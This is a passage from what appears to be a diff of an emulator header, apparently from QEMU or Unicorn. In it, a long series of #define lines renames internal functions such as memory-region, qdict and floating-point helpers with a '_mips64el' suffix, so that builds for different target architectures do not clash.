helper_vfp_fcvt_f64_to_f16_mips64el +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_mips64el +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_mips64el +#define helper_vfp_maxd helper_vfp_maxd_mips64el +#define helper_vfp_maxnumd helper_vfp_maxnumd_mips64el +#define helper_vfp_maxnums helper_vfp_maxnums_mips64el +#define helper_vfp_maxs helper_vfp_maxs_mips64el +#define helper_vfp_mind helper_vfp_mind_mips64el +#define helper_vfp_minnumd helper_vfp_minnumd_mips64el +#define helper_vfp_minnums helper_vfp_minnums_mips64el +#define helper_vfp_mins helper_vfp_mins_mips64el +#define helper_vfp_muladdd helper_vfp_muladdd_mips64el +#define helper_vfp_muladds helper_vfp_muladds_mips64el +#define helper_vfp_muld helper_vfp_muld_mips64el +#define helper_vfp_muls helper_vfp_muls_mips64el +#define helper_vfp_negd helper_vfp_negd_mips64el +#define helper_vfp_negs helper_vfp_negs_mips64el +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_mips64el +#define helper_vfp_shtod helper_vfp_shtod_mips64el +#define helper_vfp_shtos helper_vfp_shtos_mips64el +#define helper_vfp_sitod helper_vfp_sitod_mips64el +#define helper_vfp_sitos helper_vfp_sitos_mips64el +#define helper_vfp_sltod helper_vfp_sltod_mips64el +#define helper_vfp_sltos helper_vfp_sltos_mips64el +#define helper_vfp_sqrtd helper_vfp_sqrtd_mips64el +#define helper_vfp_sqrts helper_vfp_sqrts_mips64el +#define helper_vfp_sqtod helper_vfp_sqtod_mips64el +#define helper_vfp_sqtos helper_vfp_sqtos_mips64el +#define helper_vfp_subd helper_vfp_subd_mips64el +#define helper_vfp_subs helper_vfp_subs_mips64el +#define helper_vfp_toshd helper_vfp_toshd_mips64el +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_mips64el +#define helper_vfp_toshs helper_vfp_toshs_mips64el +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_mips64el +#define helper_vfp_tosid helper_vfp_tosid_mips64el +#define helper_vfp_tosis helper_vfp_tosis_mips64el +#define helper_vfp_tosizd helper_vfp_tosizd_mips64el +#define helper_vfp_tosizs helper_vfp_tosizs_mips64el +#define helper_vfp_tosld helper_vfp_tosld_mips64el +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_mips64el +#define helper_vfp_tosls helper_vfp_tosls_mips64el +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_mips64el +#define helper_vfp_tosqd helper_vfp_tosqd_mips64el +#define helper_vfp_tosqs helper_vfp_tosqs_mips64el +#define helper_vfp_touhd helper_vfp_touhd_mips64el +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_mips64el +#define helper_vfp_touhs helper_vfp_touhs_mips64el +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_mips64el +#define helper_vfp_touid helper_vfp_touid_mips64el +#define helper_vfp_touis helper_vfp_touis_mips64el +#define helper_vfp_touizd helper_vfp_touizd_mips64el +#define helper_vfp_touizs helper_vfp_touizs_mips64el +#define helper_vfp_tould helper_vfp_tould_mips64el +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_mips64el +#define helper_vfp_touls helper_vfp_touls_mips64el +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_mips64el +#define helper_vfp_touqd helper_vfp_touqd_mips64el +#define helper_vfp_touqs helper_vfp_touqs_mips64el +#define helper_vfp_uhtod helper_vfp_uhtod_mips64el +#define helper_vfp_uhtos helper_vfp_uhtos_mips64el +#define helper_vfp_uitod helper_vfp_uitod_mips64el +#define helper_vfp_uitos helper_vfp_uitos_mips64el +#define helper_vfp_ultod helper_vfp_ultod_mips64el +#define helper_vfp_ultos helper_vfp_ultos_mips64el +#define helper_vfp_uqtod helper_vfp_uqtod_mips64el +#define helper_vfp_uqtos helper_vfp_uqtos_mips64el +#define helper_wfe helper_wfe_mips64el +#define helper_wfi helper_wfi_mips64el +#define hex2decimal hex2decimal_mips64el +#define hw_breakpoint_update hw_breakpoint_update_mips64el +#define hw_breakpoint_update_all hw_breakpoint_update_all_mips64el +#define hw_watchpoint_update hw_watchpoint_update_mips64el +#define hw_watchpoint_update_all hw_watchpoint_update_all_mips64el +#define _init _init_mips64el +#define init_cpreg_list init_cpreg_list_mips64el +#define init_lists init_lists_mips64el +#define input_type_enum input_type_enum_mips64el +#define int128_2_64 int128_2_64_mips64el +#define int128_add int128_add_mips64el +#define int128_addto int128_addto_mips64el +#define int128_and int128_and_mips64el +#define int128_eq int128_eq_mips64el +#define int128_ge int128_ge_mips64el +#define int128_get64 int128_get64_mips64el +#define int128_gt int128_gt_mips64el +#define int128_le int128_le_mips64el +#define int128_lt int128_lt_mips64el +#define int128_make64 int128_make64_mips64el +#define int128_max int128_max_mips64el +#define int128_min int128_min_mips64el +#define int128_ne int128_ne_mips64el +#define int128_neg int128_neg_mips64el +#define int128_nz int128_nz_mips64el +#define int128_rshift int128_rshift_mips64el +#define int128_sub int128_sub_mips64el +#define int128_subfrom int128_subfrom_mips64el +#define int128_zero int128_zero_mips64el +#define int16_to_float32 int16_to_float32_mips64el +#define int16_to_float64 int16_to_float64_mips64el +#define int32_to_float128 int32_to_float128_mips64el +#define int32_to_float32 int32_to_float32_mips64el +#define int32_to_float64 int32_to_float64_mips64el +#define int32_to_floatx80 int32_to_floatx80_mips64el +#define int64_to_float128 int64_to_float128_mips64el +#define int64_to_float32 int64_to_float32_mips64el +#define int64_to_float64 int64_to_float64_mips64el +#define int64_to_floatx80 int64_to_floatx80_mips64el +#define invalidate_and_set_dirty invalidate_and_set_dirty_mips64el +#define invalidate_page_bitmap invalidate_page_bitmap_mips64el +#define io_mem_read io_mem_read_mips64el +#define io_mem_write io_mem_write_mips64el +#define io_readb io_readb_mips64el +#define io_readl io_readl_mips64el +#define io_readq io_readq_mips64el +#define io_readw io_readw_mips64el +#define iotlb_to_region iotlb_to_region_mips64el +#define io_writeb io_writeb_mips64el +#define io_writel io_writel_mips64el +#define io_writeq io_writeq_mips64el +#define io_writew io_writew_mips64el +#define is_a64 is_a64_mips64el +#define is_help_option is_help_option_mips64el +#define isr_read isr_read_mips64el +#define is_valid_option_list is_valid_option_list_mips64el +#define iwmmxt_load_creg iwmmxt_load_creg_mips64el +#define iwmmxt_load_reg iwmmxt_load_reg_mips64el +#define iwmmxt_store_creg iwmmxt_store_creg_mips64el +#define iwmmxt_store_reg iwmmxt_store_reg_mips64el +#define __jit_debug_descriptor __jit_debug_descriptor_mips64el +#define __jit_debug_register_code __jit_debug_register_code_mips64el +#define kvm_to_cpreg_id kvm_to_cpreg_id_mips64el +#define last_ram_offset last_ram_offset_mips64el +#define ldl_be_p ldl_be_p_mips64el +#define ldl_be_phys ldl_be_phys_mips64el +#define ldl_he_p ldl_he_p_mips64el +#define ldl_le_p ldl_le_p_mips64el +#define ldl_le_phys ldl_le_phys_mips64el +#define ldl_phys ldl_phys_mips64el +#define ldl_phys_internal ldl_phys_internal_mips64el +#define ldq_be_p ldq_be_p_mips64el +#define ldq_be_phys ldq_be_phys_mips64el +#define ldq_he_p ldq_he_p_mips64el +#define ldq_le_p ldq_le_p_mips64el +#define ldq_le_phys ldq_le_phys_mips64el +#define ldq_phys ldq_phys_mips64el +#define ldq_phys_internal ldq_phys_internal_mips64el +#define ldst_name ldst_name_mips64el +#define ldub_p ldub_p_mips64el +#define ldub_phys ldub_phys_mips64el +#define lduw_be_p lduw_be_p_mips64el +#define lduw_be_phys lduw_be_phys_mips64el +#define lduw_he_p lduw_he_p_mips64el +#define lduw_le_p lduw_le_p_mips64el +#define lduw_le_phys lduw_le_phys_mips64el +#define lduw_phys lduw_phys_mips64el +#define lduw_phys_internal lduw_phys_internal_mips64el +#define le128 le128_mips64el +#define linked_bp_matches linked_bp_matches_mips64el +#define listener_add_address_space listener_add_address_space_mips64el +#define load_cpu_offset load_cpu_offset_mips64el +#define load_reg load_reg_mips64el +#define load_reg_var load_reg_var_mips64el +#define log_cpu_state log_cpu_state_mips64el +#define lpae_cp_reginfo lpae_cp_reginfo_mips64el +#define lt128 lt128_mips64el +#define machine_class_init machine_class_init_mips64el +#define machine_finalize machine_finalize_mips64el +#define machine_info machine_info_mips64el +#define machine_initfn machine_initfn_mips64el +#define machine_register_types machine_register_types_mips64el +#define machvirt_init machvirt_init_mips64el +#define machvirt_machine_init machvirt_machine_init_mips64el +#define maj maj_mips64el +#define mapping_conflict mapping_conflict_mips64el +#define mapping_contiguous mapping_contiguous_mips64el +#define mapping_have_same_region mapping_have_same_region_mips64el +#define mapping_merge mapping_merge_mips64el +#define mem_add mem_add_mips64el +#define mem_begin mem_begin_mips64el +#define mem_commit mem_commit_mips64el +#define memory_access_is_direct memory_access_is_direct_mips64el +#define memory_access_size memory_access_size_mips64el +#define memory_init memory_init_mips64el +#define memory_listener_match memory_listener_match_mips64el +#define memory_listener_register memory_listener_register_mips64el +#define memory_listener_unregister memory_listener_unregister_mips64el +#define memory_map_init memory_map_init_mips64el +#define memory_mapping_filter memory_mapping_filter_mips64el +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_mips64el +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips64el +#define memory_mapping_list_free memory_mapping_list_free_mips64el +#define memory_mapping_list_init memory_mapping_list_init_mips64el +#define memory_region_access_valid memory_region_access_valid_mips64el +#define memory_region_add_subregion memory_region_add_subregion_mips64el +#define memory_region_add_subregion_common memory_region_add_subregion_common_mips64el +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips64el +#define memory_region_big_endian memory_region_big_endian_mips64el +#define memory_region_clear_pending memory_region_clear_pending_mips64el +#define memory_region_del_subregion memory_region_del_subregion_mips64el +#define memory_region_destructor_alias memory_region_destructor_alias_mips64el +#define memory_region_destructor_none memory_region_destructor_none_mips64el +#define memory_region_destructor_ram memory_region_destructor_ram_mips64el +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_mips64el +#define memory_region_dispatch_read memory_region_dispatch_read_mips64el +#define memory_region_dispatch_read1 memory_region_dispatch_read1_mips64el +#define memory_region_dispatch_write memory_region_dispatch_write_mips64el +#define memory_region_escape_name memory_region_escape_name_mips64el +#define memory_region_finalize memory_region_finalize_mips64el +#define memory_region_find memory_region_find_mips64el +#define memory_region_get_addr memory_region_get_addr_mips64el +#define memory_region_get_alignment memory_region_get_alignment_mips64el +#define memory_region_get_container memory_region_get_container_mips64el +#define memory_region_get_fd memory_region_get_fd_mips64el +#define memory_region_get_may_overlap memory_region_get_may_overlap_mips64el +#define memory_region_get_priority memory_region_get_priority_mips64el +#define memory_region_get_ram_addr memory_region_get_ram_addr_mips64el +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips64el +#define memory_region_get_size memory_region_get_size_mips64el +#define memory_region_info memory_region_info_mips64el +#define memory_region_init memory_region_init_mips64el +#define memory_region_init_alias memory_region_init_alias_mips64el +#define memory_region_initfn memory_region_initfn_mips64el +#define memory_region_init_io memory_region_init_io_mips64el +#define memory_region_init_ram memory_region_init_ram_mips64el +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips64el +#define memory_region_init_reservation memory_region_init_reservation_mips64el +#define memory_region_is_iommu memory_region_is_iommu_mips64el +#define memory_region_is_logging memory_region_is_logging_mips64el +#define memory_region_is_mapped memory_region_is_mapped_mips64el +#define memory_region_is_ram memory_region_is_ram_mips64el +#define memory_region_is_rom memory_region_is_rom_mips64el +#define memory_region_is_romd memory_region_is_romd_mips64el +#define memory_region_is_skip_dump memory_region_is_skip_dump_mips64el +#define memory_region_is_unassigned memory_region_is_unassigned_mips64el +#define memory_region_name memory_region_name_mips64el +#define memory_region_need_escape memory_region_need_escape_mips64el +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_mips64el +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_mips64el +#define memory_region_present memory_region_present_mips64el +#define memory_region_read_accessor memory_region_read_accessor_mips64el +#define memory_region_readd_subregion memory_region_readd_subregion_mips64el +#define memory_region_ref memory_region_ref_mips64el +#define memory_region_resolve_container memory_region_resolve_container_mips64el +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_mips64el +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips64el +#define memory_region_set_address memory_region_set_address_mips64el +#define memory_region_set_alias_offset memory_region_set_alias_offset_mips64el +#define memory_region_set_enabled memory_region_set_enabled_mips64el +#define memory_region_set_readonly memory_region_set_readonly_mips64el +#define memory_region_set_skip_dump memory_region_set_skip_dump_mips64el +#define memory_region_size memory_region_size_mips64el +#define memory_region_to_address_space memory_region_to_address_space_mips64el +#define memory_region_transaction_begin memory_region_transaction_begin_mips64el +#define memory_region_transaction_commit memory_region_transaction_commit_mips64el +#define memory_region_unref memory_region_unref_mips64el +#define memory_region_update_container_subregions memory_region_update_container_subregions_mips64el +#define memory_region_write_accessor memory_region_write_accessor_mips64el +#define memory_region_wrong_endianness memory_region_wrong_endianness_mips64el +#define memory_try_enable_merging memory_try_enable_merging_mips64el +#define module_call_init module_call_init_mips64el +#define module_load module_load_mips64el +#define mpidr_cp_reginfo mpidr_cp_reginfo_mips64el +#define mpidr_read mpidr_read_mips64el +#define msr_mask msr_mask_mips64el +#define mul128By64To192 mul128By64To192_mips64el +#define mul128To256 mul128To256_mips64el +#define mul64To128 mul64To128_mips64el +#define muldiv64 muldiv64_mips64el +#define neon_2rm_is_float_op neon_2rm_is_float_op_mips64el +#define neon_2rm_sizes neon_2rm_sizes_mips64el +#define neon_3r_sizes neon_3r_sizes_mips64el +#define neon_get_scalar neon_get_scalar_mips64el +#define neon_load_reg neon_load_reg_mips64el +#define neon_load_reg64 neon_load_reg64_mips64el +#define neon_load_scratch neon_load_scratch_mips64el +#define neon_ls_element_type neon_ls_element_type_mips64el +#define neon_reg_offset neon_reg_offset_mips64el +#define neon_store_reg neon_store_reg_mips64el +#define neon_store_reg64 neon_store_reg64_mips64el +#define neon_store_scratch neon_store_scratch_mips64el +#define new_ldst_label new_ldst_label_mips64el +#define next_list next_list_mips64el +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_mips64el +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_mips64el +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_mips64el +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_mips64el +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips64el +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_mips64el +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_mips64el +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_mips64el +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips64el +#define not_v6_cp_reginfo not_v6_cp_reginfo_mips64el +#define not_v7_cp_reginfo not_v7_cp_reginfo_mips64el +#define not_v8_cp_reginfo not_v8_cp_reginfo_mips64el +#define object_child_foreach object_child_foreach_mips64el +#define object_class_foreach object_class_foreach_mips64el +#define object_class_foreach_tramp object_class_foreach_tramp_mips64el +#define object_class_get_list object_class_get_list_mips64el +#define object_class_get_list_tramp object_class_get_list_tramp_mips64el +#define object_class_get_parent object_class_get_parent_mips64el +#define object_deinit object_deinit_mips64el +#define object_dynamic_cast object_dynamic_cast_mips64el +#define object_finalize object_finalize_mips64el +#define object_finalize_child_property object_finalize_child_property_mips64el +#define object_get_child_property object_get_child_property_mips64el +#define object_get_link_property object_get_link_property_mips64el +#define object_get_root object_get_root_mips64el +#define object_initialize_with_type object_initialize_with_type_mips64el +#define object_init_with_type object_init_with_type_mips64el +#define object_instance_init object_instance_init_mips64el +#define object_new_with_type object_new_with_type_mips64el +#define object_post_init_with_type object_post_init_with_type_mips64el +#define object_property_add_alias object_property_add_alias_mips64el +#define object_property_add_link object_property_add_link_mips64el +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_mips64el +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_mips64el +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_mips64el +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_mips64el +#define object_property_allow_set_link object_property_allow_set_link_mips64el +#define object_property_del object_property_del_mips64el +#define object_property_del_all object_property_del_all_mips64el +#define object_property_find object_property_find_mips64el +#define object_property_get object_property_get_mips64el +#define object_property_get_bool object_property_get_bool_mips64el +#define object_property_get_int object_property_get_int_mips64el +#define object_property_get_link object_property_get_link_mips64el +#define object_property_get_qobject object_property_get_qobject_mips64el +#define object_property_get_str object_property_get_str_mips64el +#define object_property_get_type object_property_get_type_mips64el +#define object_property_is_child object_property_is_child_mips64el +#define object_property_set object_property_set_mips64el +#define object_property_set_description object_property_set_description_mips64el +#define object_property_set_link object_property_set_link_mips64el +#define object_property_set_qobject object_property_set_qobject_mips64el +#define object_release_link_property object_release_link_property_mips64el +#define object_resolve_abs_path object_resolve_abs_path_mips64el +#define object_resolve_child_property object_resolve_child_property_mips64el +#define object_resolve_link object_resolve_link_mips64el +#define object_resolve_link_property object_resolve_link_property_mips64el +#define object_resolve_partial_path object_resolve_partial_path_mips64el +#define object_resolve_path object_resolve_path_mips64el +#define object_resolve_path_component object_resolve_path_component_mips64el +#define object_resolve_path_type object_resolve_path_type_mips64el +#define object_set_link_property object_set_link_property_mips64el +#define object_unparent object_unparent_mips64el +#define omap_cachemaint_write omap_cachemaint_write_mips64el +#define omap_cp_reginfo omap_cp_reginfo_mips64el +#define omap_threadid_write omap_threadid_write_mips64el +#define omap_ticonfig_write omap_ticonfig_write_mips64el +#define omap_wfi_write omap_wfi_write_mips64el +#define op_bits op_bits_mips64el +#define open_modeflags open_modeflags_mips64el +#define op_to_mov op_to_mov_mips64el +#define op_to_movi op_to_movi_mips64el +#define output_type_enum output_type_enum_mips64el +#define packFloat128 packFloat128_mips64el +#define packFloat16 packFloat16_mips64el +#define packFloat32 packFloat32_mips64el +#define packFloat64 packFloat64_mips64el +#define packFloatx80 packFloatx80_mips64el +#define page_find page_find_mips64el +#define page_find_alloc page_find_alloc_mips64el +#define page_flush_tb page_flush_tb_mips64el +#define page_flush_tb_1 page_flush_tb_1_mips64el +#define page_init page_init_mips64el +#define page_size_init page_size_init_mips64el +#define par par_mips64el +#define parse_array parse_array_mips64el +#define parse_error parse_error_mips64el +#define parse_escape parse_escape_mips64el +#define parse_keyword parse_keyword_mips64el +#define parse_literal parse_literal_mips64el +#define parse_object parse_object_mips64el +#define parse_optional parse_optional_mips64el +#define parse_option_bool parse_option_bool_mips64el +#define parse_option_number parse_option_number_mips64el +#define parse_option_size parse_option_size_mips64el +#define parse_pair parse_pair_mips64el +#define parser_context_free parser_context_free_mips64el +#define parser_context_new parser_context_new_mips64el +#define parser_context_peek_token parser_context_peek_token_mips64el +#define parser_context_pop_token parser_context_pop_token_mips64el +#define parser_context_restore parser_context_restore_mips64el +#define parser_context_save parser_context_save_mips64el +#define parse_str parse_str_mips64el +#define parse_type_bool parse_type_bool_mips64el +#define parse_type_int parse_type_int_mips64el +#define parse_type_number parse_type_number_mips64el +#define parse_type_size parse_type_size_mips64el +#define parse_type_str parse_type_str_mips64el +#define parse_value parse_value_mips64el +#define par_write par_write_mips64el +#define patch_reloc patch_reloc_mips64el +#define phys_map_node_alloc phys_map_node_alloc_mips64el +#define phys_map_node_reserve phys_map_node_reserve_mips64el +#define phys_mem_alloc phys_mem_alloc_mips64el +#define phys_mem_set_alloc phys_mem_set_alloc_mips64el +#define phys_page_compact phys_page_compact_mips64el +#define phys_page_compact_all phys_page_compact_all_mips64el +#define phys_page_find phys_page_find_mips64el +#define phys_page_set phys_page_set_mips64el +#define phys_page_set_level phys_page_set_level_mips64el +#define phys_section_add phys_section_add_mips64el +#define phys_section_destroy phys_section_destroy_mips64el +#define phys_sections_free phys_sections_free_mips64el +#define pickNaN pickNaN_mips64el +#define pickNaNMulAdd pickNaNMulAdd_mips64el +#define pmccfiltr_write pmccfiltr_write_mips64el +#define pmccntr_read pmccntr_read_mips64el +#define pmccntr_sync pmccntr_sync_mips64el +#define pmccntr_write pmccntr_write_mips64el +#define pmccntr_write32 pmccntr_write32_mips64el +#define pmcntenclr_write pmcntenclr_write_mips64el +#define pmcntenset_write pmcntenset_write_mips64el +#define pmcr_write pmcr_write_mips64el +#define pmintenclr_write pmintenclr_write_mips64el +#define pmintenset_write pmintenset_write_mips64el +#define pmovsr_write pmovsr_write_mips64el +#define pmreg_access pmreg_access_mips64el +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_mips64el +#define pmsav5_data_ap_read pmsav5_data_ap_read_mips64el +#define pmsav5_data_ap_write pmsav5_data_ap_write_mips64el +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_mips64el +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_mips64el +#define pmuserenr_write pmuserenr_write_mips64el +#define pmxevtyper_write pmxevtyper_write_mips64el +#define print_type_bool print_type_bool_mips64el +#define print_type_int print_type_int_mips64el +#define print_type_number print_type_number_mips64el +#define print_type_size print_type_size_mips64el +#define print_type_str print_type_str_mips64el +#define propagateFloat128NaN propagateFloat128NaN_mips64el +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_mips64el +#define propagateFloat32NaN propagateFloat32NaN_mips64el +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_mips64el +#define propagateFloat64NaN propagateFloat64NaN_mips64el +#define propagateFloatx80NaN propagateFloatx80NaN_mips64el +#define property_get_alias property_get_alias_mips64el +#define property_get_bool property_get_bool_mips64el +#define property_get_str property_get_str_mips64el +#define property_get_uint16_ptr property_get_uint16_ptr_mips64el +#define property_get_uint32_ptr property_get_uint32_ptr_mips64el +#define property_get_uint64_ptr property_get_uint64_ptr_mips64el +#define property_get_uint8_ptr property_get_uint8_ptr_mips64el +#define property_release_alias property_release_alias_mips64el +#define property_release_bool property_release_bool_mips64el +#define property_release_str property_release_str_mips64el +#define property_resolve_alias property_resolve_alias_mips64el +#define property_set_alias property_set_alias_mips64el +#define property_set_bool property_set_bool_mips64el +#define property_set_str property_set_str_mips64el +#define pstate_read pstate_read_mips64el +#define pstate_write pstate_write_mips64el +#define pxa250_initfn pxa250_initfn_mips64el +#define pxa255_initfn pxa255_initfn_mips64el +#define pxa260_initfn pxa260_initfn_mips64el +#define pxa261_initfn pxa261_initfn_mips64el +#define pxa262_initfn pxa262_initfn_mips64el +#define pxa270a0_initfn pxa270a0_initfn_mips64el +#define pxa270a1_initfn pxa270a1_initfn_mips64el +#define pxa270b0_initfn pxa270b0_initfn_mips64el +#define pxa270b1_initfn pxa270b1_initfn_mips64el +#define pxa270c0_initfn pxa270c0_initfn_mips64el +#define pxa270c5_initfn pxa270c5_initfn_mips64el +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_mips64el +#define qapi_dealloc_end_list qapi_dealloc_end_list_mips64el +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_mips64el +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_mips64el +#define qapi_dealloc_next_list qapi_dealloc_next_list_mips64el +#define qapi_dealloc_pop qapi_dealloc_pop_mips64el +#define qapi_dealloc_push qapi_dealloc_push_mips64el +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_mips64el +#define qapi_dealloc_start_list qapi_dealloc_start_list_mips64el +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_mips64el +#define qapi_dealloc_start_union qapi_dealloc_start_union_mips64el +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_mips64el +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_mips64el +#define qapi_dealloc_type_int qapi_dealloc_type_int_mips64el +#define qapi_dealloc_type_number qapi_dealloc_type_number_mips64el +#define qapi_dealloc_type_size qapi_dealloc_type_size_mips64el +#define qapi_dealloc_type_str qapi_dealloc_type_str_mips64el +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_mips64el +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_mips64el +#define qapi_free_boolList qapi_free_boolList_mips64el +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_mips64el +#define qapi_free_int16List qapi_free_int16List_mips64el +#define qapi_free_int32List qapi_free_int32List_mips64el +#define qapi_free_int64List qapi_free_int64List_mips64el +#define qapi_free_int8List qapi_free_int8List_mips64el +#define qapi_free_intList qapi_free_intList_mips64el +#define qapi_free_numberList qapi_free_numberList_mips64el +#define qapi_free_strList qapi_free_strList_mips64el +#define qapi_free_uint16List qapi_free_uint16List_mips64el +#define qapi_free_uint32List qapi_free_uint32List_mips64el +#define qapi_free_uint64List qapi_free_uint64List_mips64el +#define qapi_free_uint8List qapi_free_uint8List_mips64el +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_mips64el +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_mips64el +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_mips64el +#define qbool_destroy_obj qbool_destroy_obj_mips64el +#define qbool_from_int qbool_from_int_mips64el +#define qbool_get_int qbool_get_int_mips64el +#define qbool_type qbool_type_mips64el +#define qbus_create qbus_create_mips64el +#define qbus_create_inplace qbus_create_inplace_mips64el +#define qbus_finalize qbus_finalize_mips64el +#define qbus_initfn qbus_initfn_mips64el +#define qbus_realize qbus_realize_mips64el +#define qdev_create qdev_create_mips64el +#define qdev_get_type qdev_get_type_mips64el +#define qdev_register_types qdev_register_types_mips64el +#define qdev_set_parent_bus qdev_set_parent_bus_mips64el +#define qdev_try_create qdev_try_create_mips64el +#define qdict_add_key qdict_add_key_mips64el +#define qdict_array_split qdict_array_split_mips64el +#define qdict_clone_shallow qdict_clone_shallow_mips64el +#define qdict_del qdict_del_mips64el +#define qdict_destroy_obj qdict_destroy_obj_mips64el +#define qdict_entry_key qdict_entry_key_mips64el +#define qdict_entry_value qdict_entry_value_mips64el +#define qdict_extract_subqdict qdict_extract_subqdict_mips64el +#define qdict_find qdict_find_mips64el +#define qdict_first qdict_first_mips64el +#define qdict_flatten qdict_flatten_mips64el +#define qdict_flatten_qdict qdict_flatten_qdict_mips64el +#define qdict_flatten_qlist qdict_flatten_qlist_mips64el +#define qdict_get qdict_get_mips64el +#define qdict_get_bool qdict_get_bool_mips64el +#define qdict_get_double qdict_get_double_mips64el +#define qdict_get_int qdict_get_int_mips64el +#define qdict_get_obj qdict_get_obj_mips64el +#define qdict_get_qdict qdict_get_qdict_mips64el +#define qdict_get_qlist qdict_get_qlist_mips64el +#define qdict_get_str qdict_get_str_mips64el +#define qdict_get_try_bool qdict_get_try_bool_mips64el +#define qdict_get_try_int qdict_get_try_int_mips64el +#define qdict_get_try_str qdict_get_try_str_mips64el +#define qdict_haskey qdict_haskey_mips64el +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_mips64el +#define qdict_iter qdict_iter_mips64el +#define qdict_join qdict_join_mips64el +#define qdict_new qdict_new_mips64el +#define qdict_next qdict_next_mips64el +#define qdict_next_entry qdict_next_entry_mips64el +#define qdict_put_obj qdict_put_obj_mips64el +#define qdict_size qdict_size_mips64el +#define qdict_type qdict_type_mips64el +#define qemu_clock_get_us qemu_clock_get_us_mips64el +#define qemu_clock_ptr qemu_clock_ptr_mips64el +#define qemu_clocks qemu_clocks_mips64el +#define qemu_get_cpu qemu_get_cpu_mips64el +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_mips64el +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_mips64el +#define qemu_get_ram_block qemu_get_ram_block_mips64el +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_mips64el +#define qemu_get_ram_fd qemu_get_ram_fd_mips64el +#define qemu_get_ram_ptr qemu_get_ram_ptr_mips64el +#define qemu_host_page_mask qemu_host_page_mask_mips64el +#define qemu_host_page_size qemu_host_page_size_mips64el +#define qemu_init_vcpu qemu_init_vcpu_mips64el +#define qemu_ld_helpers qemu_ld_helpers_mips64el +#define qemu_log_close qemu_log_close_mips64el +#define qemu_log_enabled qemu_log_enabled_mips64el +#define qemu_log_flush qemu_log_flush_mips64el +#define qemu_loglevel_mask qemu_loglevel_mask_mips64el +#define qemu_log_vprintf qemu_log_vprintf_mips64el +#define qemu_oom_check qemu_oom_check_mips64el +#define qemu_parse_fd qemu_parse_fd_mips64el +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips64el +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_mips64el +#define qemu_ram_alloc qemu_ram_alloc_mips64el +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips64el +#define qemu_ram_foreach_block qemu_ram_foreach_block_mips64el +#define qemu_ram_free qemu_ram_free_mips64el +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_mips64el +#define qemu_ram_ptr_length qemu_ram_ptr_length_mips64el +#define qemu_ram_remap qemu_ram_remap_mips64el +#define qemu_ram_setup_dump qemu_ram_setup_dump_mips64el +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_mips64el +#define qemu_real_host_page_size qemu_real_host_page_size_mips64el +#define qemu_st_helpers qemu_st_helpers_mips64el +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_mips64el +#define qemu_try_memalign qemu_try_memalign_mips64el +#define qentry_destroy qentry_destroy_mips64el +#define qerror_human qerror_human_mips64el +#define qerror_report qerror_report_mips64el +#define qerror_report_err qerror_report_err_mips64el +#define qfloat_destroy_obj qfloat_destroy_obj_mips64el +#define qfloat_from_double qfloat_from_double_mips64el +#define qfloat_get_double qfloat_get_double_mips64el +#define qfloat_type qfloat_type_mips64el 